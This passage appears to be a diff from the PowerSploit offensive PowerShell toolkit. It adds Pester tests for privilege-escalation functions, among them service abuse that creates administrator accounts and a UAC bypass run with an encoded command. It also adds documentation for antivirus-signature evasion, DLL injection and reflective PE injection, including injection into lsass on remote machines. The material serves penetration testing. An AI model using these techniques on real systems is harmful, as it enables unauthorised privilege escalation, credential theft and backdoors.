($Output.Length -lt 2) { + Throw "'Get-ProcessTokenGroup' doesn't return Dacls for multiple service objects on the pipeline." } } It 'Should return the local administrators group SID.' { - $CurrentUserSids = Get-CurrentUserTokenGroupSid | Select-Object -ExpandProperty SID + $CurrentUserSids = Get-ProcessTokenGroup | Select-Object -ExpandProperty SID - if($CurrentUserSids -notcontains 'S-1-5-32-544') { - Throw "Get-CurrentUserTokenGroupSid result doesn't contain local administrators 'S-1-5-32-544' sid" + if ($CurrentUserSids -notcontains 'S-1-5-32-544') { + Throw "Get-ProcessTokenGroup result doesn't contain local administrators 'S-1-5-32-544' sid" } } } + +Describe 'Get-ProcessTokenPrivilege' { + + if (-not $(Test-IsAdmin)) { + Throw "'Get-ProcessTokenPrivilege' Pester test needs local administrator privileges." + } + + It 'Should not throw.' { + {Get-ProcessTokenPrivilege} | Should Not Throw + } + + It 'Should return Privilege, Attribute, and ProcessID.' { + $Output = Get-ProcessTokenPrivilege | Select-Object -First 1 + + if ($Output.PSObject.Properties.Name -notcontains 'Privilege') { + Throw "Get-ProcessTokenPrivilege result doesn't contain 'Privilege' field." + } + + if ($Output.PSObject.Properties.Name -notcontains 'Attributes') { + Throw "Get-ProcessTokenPrivilege result doesn't contain 'Attributes' field." + } + + if ($Output.PSObject.Properties.Name -notcontains 'ProcessID') { + Throw "Get-ProcessTokenPrivilege result doesn't contain 'ProcessID' field." + } + } + + It 'Should accept the -Special argument' { + $Output = Get-Process -Id $PID | Get-ProcessTokenPrivilege -Special | Select-Object -First 1 + $Output | Should Not BeNullOrEmpty + } + + It 'Should accept a process object on the pipeline.' { + $Output = Get-Process -Id $PID | Get-ProcessTokenPrivilege | Select-Object -First 1 + $Output | Should Not BeNullOrEmpty + } + + It 'Should accept multiple process objects on the pipeline.' { + $Output = @($(Get-Process -Id $PID), $(Get-Process -Id $PID)) | Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'} + if ($Output.Length -lt 2) { + Throw "'Get-ProcessTokenPrivilege' doesn't return Dacls for multiple service objects on the pipeline." + } + } + + It 'Should return the correct privileges.' { + $Privileges = Get-ProcessTokenPrivilege | Select-Object -ExpandProperty Privilege + + if ($Privileges -NotContains 'SeShutdownPrivilege') { + Throw "Get-ProcessTokenPrivilege result doesn't the SeShutdownPrivilege" + } + } +} + + +Describe 'Enable-Privilege' { + if (-not $(Test-IsAdmin)) { + Throw "'Enable-Privilege' Pester test needs local administrator privileges." + } + + It 'Should not accept an invalid privilege.' { + {Enable-Privilege -Privilege 'nonexistent'} | Should Throw + } + + It 'Should successfully enable a specified privilege.' { + $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'} + if ($Output.Attributes -ne 0) { + Throw "'SeShutdownPrivilege is already enabled." + } + {Enable-Privilege -Privilege 'SeShutdownPrivilege'} | Should Not Throw + $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeShutdownPrivilege'} + if ($Output.Attributes -eq 0) { + Throw "'SeShutdownPrivilege not successfully enabled." + } + } + + It 'Should accept the output from Get-ProcessTokenPrivilege.' { + {Get-ProcessTokenPrivilege | Enable-Privilege} | Should Not Throw + $Output = Get-ProcessTokenPrivilege | Where-Object {$_.Privilege -match 'SeBackupPrivilege'} + if ($Output.Attributes -eq 0) { + Throw "'SeBackupPrivilege not successfully enabled." + } + } +} + + Describe 'Add-ServiceDacl' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Add-ServiceDacl' Pester test needs local administrator privileges." } @@ -176,7 +278,7 @@ Describe 'Add-ServiceDacl' { $ServiceName = Get-Service | Select-Object -First 1 | Select-Object -ExpandProperty Name $ServiceWithDacl = Add-ServiceDacl -Name $ServiceName - if(-not $ServiceWithDacl.Dacl) { + if (-not $ServiceWithDacl.Dacl) { Throw "'Add-ServiceDacl' doesn't return a Dacl for a service passed as parameter." } } @@ -185,7 +287,7 @@ Describe 'Add-ServiceDacl' { $ServiceNames = Get-Service | Select-Object -First 5 | Select-Object -ExpandProperty Name $ServicesWithDacl = Add-ServiceDacl -Name $ServiceNames - if(-not $ServicesWithDacl.Dacl) { + if (-not $ServicesWithDacl.Dacl) { Throw "'Add-ServiceDacl' doesn't return Dacls for an array of service names as a parameter." } } @@ -194,7 +296,7 @@ Describe 'Add-ServiceDacl' { $Service = Get-Service | Select-Object -First 1 $ServiceWithDacl = $Service | Add-ServiceDacl - if(-not $ServiceWithDacl.Dacl) { + if (-not $ServiceWithDacl.Dacl) { Throw "'Add-ServiceDacl' doesn't return a Dacl for a service object on the pipeline." } } @@ -203,7 +305,7 @@ Describe 'Add-ServiceDacl' { $ServiceName = Get-Service | Select-Object -First 1 | Select-Object -ExpandProperty Name $ServiceWithDacl = $ServiceName | Add-ServiceDacl - if(-not $ServiceWithDacl.Dacl) { + if (-not $ServiceWithDacl.Dacl) { Throw "'Add-ServiceDacl' doesn't return a Dacl for a service name on the pipeline." } } @@ -212,7 +314,7 @@ Describe 'Add-ServiceDacl' { $Services = Get-Service | Select-Object -First 5 $ServicesWithDacl = $Services | Add-ServiceDacl - if(-not $ServicesWithDacl.Dacl) { + if (-not $ServicesWithDacl.Dacl) { Throw "'Add-ServiceDacl' doesn't return Dacls for multiple service objects on the pipeline." } } @@ -221,7 +323,7 @@ Describe 'Add-ServiceDacl' { $ServiceNames = Get-Service | Select-Object -First 5 | Select-Object -ExpandProperty Name $ServicesWithDacl = $ServiceNames | Add-ServiceDacl - if(-not $ServicesWithDacl.Dacl) { + if (-not $ServicesWithDacl.Dacl) { Throw "'Add-ServiceDacl' doesn't return Dacls for multiple service names on the pipeline." } } @@ -232,16 +334,16 @@ Describe 'Add-ServiceDacl' { # 'AllAccess' = [uint32]'0x000F01FF' $Rights = $ServiceWithDacl.Dacl | Where-Object {$_.SecurityIdentifier -eq 'S-1-5-32-544'} - if(($Rights.AccessRights -band 0x000F01FF) -ne 0x000F01FF) { + if (($Rights.AccessRights -band 0x000F01FF) -ne 0x000F01FF) { Throw "'Add-ServiceDacl' doesn't return the correct service Dacl." } } } -Describe 'Set-ServiceBinPath' { +Describe 'Set-ServiceBinaryPath' { - if(-not $(Test-IsAdmin)) { - Throw "'Set-ServiceBinPath' Pester test needs local administrator privileges." + if (-not $(Test-IsAdmin)) { + Throw "'Set-ServiceBinaryPath' Pester test needs local administrator privileges." } It 'Should fail for a non-existent service.' { @@ -249,13 +351,13 @@ Describe 'Set-ServiceBinPath' { $ServicePath = 'C:\Program Files\service.exe' $Result = $False - {$Result = Set-ServiceBinPath -Name $ServiceName -binPath $ServicePath} | Should Throw + {$Result = Set-ServiceBinaryPath -Name $ServiceName -Path $ServicePath} | Should Throw $Result | Should Be $False } - It 'Should throw with an empty binPath.' { + It 'Should throw with an empty Path.' { $ServiceName = Get-RandomName - {Set-ServiceBinPath -Name $ServiceName -binPath ''} | Should Throw + {Set-ServiceBinaryPath -Name $ServiceName -Path ''} | Should Throw } It 'Should correctly set a service binary path.' { @@ -264,7 +366,7 @@ Describe 'Set-ServiceBinPath' { sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS' Start-Sleep -Seconds 1 - $Result = Set-ServiceBinPath -Name $ServiceName -binPath $ServicePath + $Result = Set-ServiceBinaryPath -Name $ServiceName -Path $ServicePath $Result | Should Be $True $ServiceDetails = Get-WmiObject -Class win32_service -Filter "Name='$ServiceName'" $ServiceDetails.PathName | Should be $ServicePath @@ -278,7 +380,7 @@ Describe 'Set-ServiceBinPath' { sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS' Start-Sleep -Seconds 1 - $Result = $ServiceName | Set-ServiceBinPath -binPath $ServicePath + $Result = $ServiceName | Set-ServiceBinaryPath -Path $ServicePath $Result | Should Be $True $ServiceDetails = Get-WmiObject -Class win32_service -Filter "Name='$ServiceName'" @@ -293,7 +395,7 @@ Describe 'Set-ServiceBinPath' { sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS' Start-Sleep -Seconds 1 - $Result = Get-Service $ServiceName | Set-ServiceBinPath -binPath $ServicePath + $Result = Get-Service $ServiceName | Set-ServiceBinaryPath -Path $ServicePath $Result | Should Be $True $ServiceDetails = Get-WmiObject -Class win32_service -Filter "Name='$ServiceName'" @@ -306,7 +408,7 @@ Describe 'Set-ServiceBinPath' { Describe 'Test-ServiceDaclPermission' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Test-ServiceDaclPermission' Pester test needs local administrator privileges." } @@ -445,14 +547,14 @@ Describe 'Test-ServiceDaclPermission' { # ######################################################## -Describe 'Get-ServiceUnquoted' { +Describe 'Get-UnquotedService' { - if(-not $(Test-IsAdmin)) { - Throw "'Get-ServiceUnquoted' Pester test needs local administrator privileges." + if (-not $(Test-IsAdmin)) { + Throw "'Get-UnquotedService' Pester test needs local administrator privileges." } It "Should not throw." { - {Get-ServiceUnquoted} | Should Not Throw + {Get-UnquotedService} | Should Not Throw } It 'Should return service with a space in an unquoted binPath.' { @@ -463,7 +565,7 @@ Describe 'Get-ServiceUnquoted' { sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS' Start-Sleep -Seconds 1 - $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName } + $Output = Get-UnquotedService | Where-Object { $_.ServiceName -eq $ServiceName } sc.exe delete $ServiceName | Should Match 'SUCCESS' $Output | Should Not BeNullOrEmpty @@ -478,7 +580,7 @@ Describe 'Get-ServiceUnquoted' { sc.exe create $ServiceName binPath= $ServicePath | Should Match 'SUCCESS' Start-Sleep -Seconds 1 - $Output = Get-ServiceUnquoted | Where-Object { $_.ServiceName -eq $ServiceName } + $Output = Get-UnquotedService | Where-Object { $_.ServiceName -eq $ServiceName } sc.exe delete $ServiceName | Should Match 'SUCCESS' $Output | Should BeNullOrEmpty @@ -488,7 +590,7 @@ Describe 'Get-ServiceUnquoted' { Describe 'Get-ModifiableServiceFile' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-ModifiableServiceFile ' Pester test needs local administrator privileges." } @@ -532,11 +634,11 @@ Describe 'Get-ModifiableServiceFile' { Throw "Get-ModifiableServiceFile result doesn't contain 'CanRestart' field." } - if($Output.Path -ne $ServicePath) { + if ($Output.Path -ne $ServicePath) { Throw "Get-ModifiableServiceFile result doesn't return correct Path for a modifiable service file." } - if($Output.ModifiableFile -ne $ServicePath) { + if ($Output.ModifiableFile -ne $ServicePath) { Throw "Get-ModifiableServiceFile result doesn't return correct ModifiableFile for a modifiable service file." } @@ -553,7 +655,7 @@ Describe 'Get-ModifiableServiceFile' { Describe 'Get-ModifiableService' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-ModifiableService' Pester test needs local administrator privileges." } @@ -622,7 +724,7 @@ Describe 'Get-ServiceDetail' { Describe 'Invoke-ServiceAbuse' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Invoke-ServiceAbuse' Pester test needs local administrator privileges." } @@ -640,7 +742,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = Invoke-ServiceAbuse -Name 'PowerUpService' $Output.Command | Should Match 'net' - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } } @@ -649,7 +751,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = Invoke-ServiceAbuse -Name 'PowerUpService' -Force $Output.Command | Should Match 'net' - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } } @@ -658,7 +760,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = 'PowerUpService' | Invoke-ServiceAbuse $Output.Command | Should Match 'net' - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } } @@ -667,7 +769,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = Get-Service 'PowerUpService' | Invoke-ServiceAbuse $Output.Command | Should Match 'net' - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } } @@ -675,7 +777,7 @@ Describe 'Invoke-ServiceAbuse' { It 'User should not be created for a non-existent service.' { {Invoke-ServiceAbuse -ServiceName 'NonExistentService456'} | Should Throw - if( ($(net localgroup Administrators) -match 'john')) { + if ( ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' should not have been created for non-existent service." } } @@ -684,7 +786,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Username 'PowerUp' -Password 'PASSword123!' $Output.Command | Should Match 'net' - if( -not ($(net localgroup Administrators) -match 'PowerUp')) { + if ( -not ($(net localgroup Administrators) -match 'PowerUp')) { Throw "Local user 'PowerUp' not created." } $Null = $(net user PowerUp /delete >$Null 2>&1) @@ -698,7 +800,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Credential $Credential $Output.Command | Should Match 'net' - if( -not ($(net localgroup Administrators) -match 'PowerUp')) { + if ( -not ($(net localgroup Administrators) -match 'PowerUp')) { Throw "Local user 'PowerUp' not created." } $Null = $(net user PowerUp123 /delete >$Null 2>&1) @@ -708,7 +810,7 @@ Describe 'Invoke-ServiceAbuse' { $Output = Invoke-ServiceAbuse -Name 'PowerUpService' -LocalGroup 'Guests' $Output.Command | Should Match 'net' - if( -not ($(net localgroup Guests) -match 'john')) { + if ( -not ($(net localgroup Guests) -match 'john')) { Throw "Local user 'john' not added to 'Guests'." } } @@ -717,7 +819,7 @@ Describe 'Invoke-ServiceAbuse' { $FilePath = "$(Get-Location)\$([IO.Path]::GetRandomFileName())" $Output = Invoke-ServiceAbuse -ServiceName 'PowerUpService' -Command 'net user testing Password123! /add' - if( -not ($(net user) -match "testing")) { + if ( -not ($(net user) -match "testing")) { Throw 'Custom command failed.' } $Null = $(net user testing /delete >$Null 2>&1) @@ -727,7 +829,7 @@ Describe 'Invoke-ServiceAbuse' { Describe 'Install-ServiceBinary' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Install-ServiceBinary' Pester test needs local administrator privileges." } @@ -744,10 +846,10 @@ Describe 'Install-ServiceBinary' { $Null = $(net user john /delete >$Null 2>&1) } finally { - if(Test-Path "$(Get-Location)\powerup.exe") { + if (Test-Path "$(Get-Location)\powerup.exe") { $Null = Remove-Item -Path "$(Get-Location)\powerup.exe" -Force -ErrorAction SilentlyContinue } - if(Test-Path "$(Get-Location)\powerup.exe.bak") { + if (Test-Path "$(Get-Location)\powerup.exe.bak") { $Null = Remove-Item -Path "$(Get-Location)\powerup.exe.bak" -Force -ErrorAction SilentlyContinue } } @@ -759,7 +861,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } $Null = Stop-Service -Name PowerUpService -Force @@ -774,7 +876,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } $Null = Stop-Service -Name PowerUpService -Force @@ -789,7 +891,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net localgroup Administrators) -match 'john')) { + if ( -not ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' not created." } $Null = Stop-Service -Name PowerUpService -Force @@ -801,7 +903,7 @@ Describe 'Install-ServiceBinary' { It 'User should not be created for a non-existent service.' { {Install-ServiceBinary -ServiceName "NonExistentService456"} | Should Throw - if( ($(net localgroup Administrators) -match 'john')) { + if ( ($(net localgroup Administrators) -match 'john')) { Throw "Local user 'john' should not have been created for non-existent service." } } @@ -813,7 +915,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net localgroup Administrators) -match 'PowerUp')) { + if ( -not ($(net localgroup Administrators) -match 'PowerUp')) { Throw "Local user 'PowerUp' not created." } @@ -835,7 +937,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net localgroup Administrators) -match 'PowerUp123')) { + if ( -not ($(net localgroup Administrators) -match 'PowerUp123')) { Throw "Local user 'PowerUp123' not created." } $Null = $(net user PowerUp123 /delete >$Null 2>&1) @@ -851,7 +953,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net localgroup Guests) -match 'PowerUp')) { + if ( -not ($(net localgroup Guests) -match 'PowerUp')) { Throw "Local user 'PowerUp' not created." } @@ -870,7 +972,7 @@ Describe 'Install-ServiceBinary' { $Null = Start-Service -Name PowerUpService -ErrorAction SilentlyContinue Start-Sleep -Seconds 3 - if( -not ($(net user) -match "testing")) { + if ( -not ($(net user) -match "testing")) { Throw "Custom command failed." } @@ -883,6 +985,7 @@ Describe 'Install-ServiceBinary' { } } +# TODO: Describe 'Restore-ServiceBinary' {} ######################################################## # @@ -908,7 +1011,7 @@ Describe 'Find-ProcessDLLHijack' { Describe 'Find-PathDLLHijack' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Find-PathDLLHijack' Pester test needs local administrator privileges." } @@ -1010,7 +1113,7 @@ Describe 'Get-RegistryAutoLogon' { Describe 'Get-ModifiableRegistryAutoRun' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-ModifiableRegistryAutoRun' Pester test needs local administrator privileges." } @@ -1065,7 +1168,7 @@ Describe 'Get-ModifiableRegistryAutoRun' { Describe 'Get-ModifiableScheduledTaskFile' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-ModifiableScheduledTaskFile' Pester test needs local administrator privileges." } @@ -1114,7 +1217,7 @@ Describe 'Get-ModifiableScheduledTaskFile' { Describe 'Get-UnattendedInstallFile' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-UnattendedInstallFile' Pester test needs local administrator privileges." } @@ -1239,7 +1342,7 @@ Describe 'Get-SiteListPassword' { Describe 'Get-CachedGPPPassword' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-CachedGPPPassword' Pester test needs local administrator privileges." } @@ -1262,14 +1365,39 @@ Describe 'Get-CachedGPPPassword' { } } +# TODO: Describe 'Write-UserAddMSI' {} + +Describe 'Invoke-WScriptUACBypass' { + $OSVersion = [Environment]::OSVersion.Version + if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) { + It 'Should launch an elevated command.' { + Invoke-WScriptUACBypass -Command 'powershell -enc JwAxADIAMwAnACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAcwBrAGEAZABqAGYAbgAuAHQAeAB0ACIA' + if (-not (Test-Path -Path "C:\Windows\System32\skadjfn.txt")) { + Throw "'Invoke-WScriptUACBypass' did not write a privileged file." + } + {Test-Path -Path "C:\Windows\System32\skadjfn.txt"} | Should Not Throw + Remove-Item -Path "C:\Windows\System32\skadjfn.txt" -Force + } + + It "Should accept -WindowStyle 'Visible'" { + Invoke-WScriptUACBypass -Command notepad.exe -WindowStyle 'Visible' + $Process = Get-Process 'notepad' + $Process | Should Not BeNullOrEmpty + $Process | Stop-Process -Force + } + } + else { + Write-Warning 'Target machine is not vulnerable to Invoke-WScriptUACBypass.' + } +} -Describe 'Invoke-AllChecks' { +Describe 'Invoke-PrivescAudit' { It 'Should return results to stdout.' { - $Output = Invoke-AllChecks + $Output = Invoke-PrivescAudit $Output | Should Not BeNullOrEmpty } It 'Should produce a HTML report with -HTMLReport.' { - $Output = Invoke-AllChecks -HTMLReport + $Output = Invoke-PrivescAudit -HTMLReport $Output | Should Not BeNullOrEmpty $HtmlReportFile = "$($Env:ComputerName).$($Env:UserName).html" @@ -1282,7 +1410,7 @@ Describe 'Invoke-AllChecks' { Describe 'Get-System' { - if(-not $(Test-IsAdmin)) { + if (-not $(Test-IsAdmin)) { Throw "'Get-System' Pester test needs local administrator privileges." } diff --git a/docs/AntivirusBypass/Find-AVSignature.md b/docs/AntivirusBypass/Find-AVSignature.md new file mode 100755 index 00000000..16061541 --- /dev/null +++ b/docs/AntivirusBypass/Find-AVSignature.md @@ -0,0 +1,158 @@ +# Find-AVSignature + +## SYNOPSIS +Locate tiny AV signatures. + +PowerSploit Function: Find-AVSignature +Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Find-AVSignature [-StartByte] [-EndByte] [-Interval] [[-Path] ] + [[-OutPath] ] [[-BufferLen] ] [-Force] +``` + +## DESCRIPTION +Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe +``` + +Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose +Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose +Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose +Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose + +## PARAMETERS + +### -StartByte +Specifies the first byte to begin splitting on. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EndByte +Specifies the last byte to split on. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Interval +Specifies the interval size to split with. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: + +Required: True +Position: 3 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Specifies the path to the binary you want tested. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 4 +Default value: ($pwd.path) +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -OutPath +Optionally specifies the directory to write the binaries to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: ($pwd) +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -BufferLen +Specifies the length of the file read buffer . +Defaults to 64KB. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 6 +Default value: 65536 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Force +Forces the script to continue without confirmation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +Several of the versions of "DSplit.exe" available on the internet contain malware. + +## RELATED LINKS + +[http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html +https://github.com/mattifestation/PowerSploit +http://www.exploit-monday.com/ +http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2](http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html +https://github.com/mattifestation/PowerSploit +http://www.exploit-monday.com/ +http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2) + diff --git a/docs/CodeExecution/Invoke-DllInjection.md b/docs/CodeExecution/Invoke-DllInjection.md new file mode 100755 index 00000000..d41bf318 --- /dev/null +++ b/docs/CodeExecution/Invoke-DllInjection.md @@ -0,0 +1,79 @@ +# Invoke-DllInjection + +## SYNOPSIS +Injects a Dll into the process ID of your choosing. + +PowerSploit Function: Invoke-DllInjection +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-DllInjection [-ProcessID] [-Dll] +``` + +## DESCRIPTION +Invoke-DllInjection injects a Dll into an arbitrary process. +It does this by using VirtualAllocEx to allocate memory the size of the +DLL in the remote process, writing the names of the DLL to load into the +remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread +to invoke LoadLibraryA in the context of the remote process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-DllInjection -ProcessID 4274 -Dll evil.dll +``` + +Description +----------- +Inject 'evil.dll' into process ID 4274. + +## PARAMETERS + +### -ProcessID +Process ID of the process you want to inject a Dll into. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Dll +Name of the dll to inject. +This can be an absolute or relative path. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +Use the '-Verbose' option to print detailed information. + +## RELATED LINKS + +[http://www.exploit-monday.com](http://www.exploit-monday.com) + diff --git a/docs/CodeExecution/Invoke-ReflectivePEInjection.md b/docs/CodeExecution/Invoke-ReflectivePEInjection.md new file mode 100755 index 00000000..aee653d8 --- /dev/null +++ b/docs/CodeExecution/Invoke-ReflectivePEInjection.md @@ -0,0 +1,300 @@ +# Invoke-ReflectivePEInjection + +## SYNOPSIS +This script has two modes. +It can reflectively load a DLL/EXE in to the PowerShell process, +or it can reflectively load a DLL in to a remote process. +These modes have different parameters and constraints, +please lead the Notes section (GENERAL NOTES) for information on how to use them. + +1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. +Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. + +This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, +this will load and execute the DLL/EXE in to memory without writing any files to disk. + +2.) Reflectively load a DLL in to memory of a remote process. +As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. + +This is probably most useful for injecting backdoors in SYSTEM processes in Session0. +Currently, you cannot retrieve output +from the DLL. +The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the +remote process. + +PowerSploit Function: Invoke-ReflectivePEInjection +Author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Invoke-ReflectivePEInjection [-PEBytes] [[-ComputerName] ] [[-FuncReturnType] ] + [[-ExeArgs] ] [[-ProcId] ] [[-ProcName] ] [-ForceASLR] [-DoNotZeroMZ] +``` + +## DESCRIPTION +Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print +``` + +the wchar_t* returned by WStringFunc() from all the computers. +$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Load DemoEXE and run it locally. +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Load DemoEXE and run it locally. Forces ASLR on for the EXE. +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. +``` + +$PEBytes = \[IO.File\]::ReadAllBytes('DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local + +## PARAMETERS + +### -PEBytes +A byte array containing a DLL/EXE to load and execute. + +```yaml +Type: Byte[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerName +Optional, an array of computernames to run the script on. + +```yaml +Type: 